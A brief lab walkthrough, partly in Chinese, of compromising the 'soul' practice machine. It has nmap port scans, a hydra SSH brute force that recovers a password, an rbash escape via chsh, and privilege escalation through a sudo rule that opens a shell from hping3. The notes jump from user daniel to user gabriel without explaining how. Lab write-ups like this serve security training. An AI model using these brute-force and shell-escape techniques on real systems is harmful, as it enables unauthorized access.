sudo nmap --min-rate 10000 -p- 192.168.56.115 Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-16 09:32 UTC Nmap scan report for 192.168.56.115 (192.168.56.115) Host is up (0.00031s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http MAC Address: 08:00:27:C6:C3:71 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 2.59 seconds
sudo nmap -sT -sV -sC -O -p22,80 192.168.56.115 Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-16 09:32 UTC Nmap scan report for 192.168.56.115 (192.168.56.115) Host is up (0.00029s latency).
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | ssh-hostkey: | 2048 8a:e9:c1:c2:a3:44:40:26:6f:22:37:c3:fe:a1:19:f2 (RSA) | 256 4f:4a:d6:47:1a:87:7e:69:86:7f:5e:11:5c:4f:f1:48 (ECDSA) |_ 256 46:f4:2c:28:53:ef:4c:2b:70:f8:99:7e:39:64:ec:07 (ED25519) 80/tcp open http nginx 1.14.2 |_http-server-header: nginx/1.14.2 |_http-title: Site doesn't have a title (text/html). MAC Address: 08:00:27:C6:C3:71 (Oracle VirtualBox virtual NIC) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 4.X|5.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 OS details: Linux 4.15 - 5.8 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.10 seconds
hydra -L /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -p lionsarebigcats ssh://192.168.56.115 Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-02-16 09:41:31 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 8295455 login tries (l:8295455/p:1), ~518466 tries per task [DATA] attacking ssh://192.168.56.115:22/ [22][ssh] host: 192.168.56.115 login: daniel password: lionsarebigcats
得到凭证daniel:lionsarebigcats
直接ssh连接
提权
结果发现这个用户的环境是rbash,也就是受限制的bash
chsh -s /bin/bash daniel
发现是有权限改bash环境的,改完之后重新登录发现不受限制了
发现没有什么其他敏感信息,传pspy,发现有一个进程,在搜SUID的时候也有这个
/sbin/agetty -o -p -- \u --noclear tty1 linux -rwsrws--- 1 root peter 64744 Jan 10 2019 /usr/sbin/agetty
sudo -l sudo -l Matching Defaults entries for gabriel on soul: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User gabriel may run the following commands on soul: (peter) NOPASSWD: /usr/sbin/hping3
gabriel@soul:~$ sudo -u peter /usr/sbin/hping3 sudo -u peter /usr/sbin/hping3 hping3> /bin/bash /bin/bash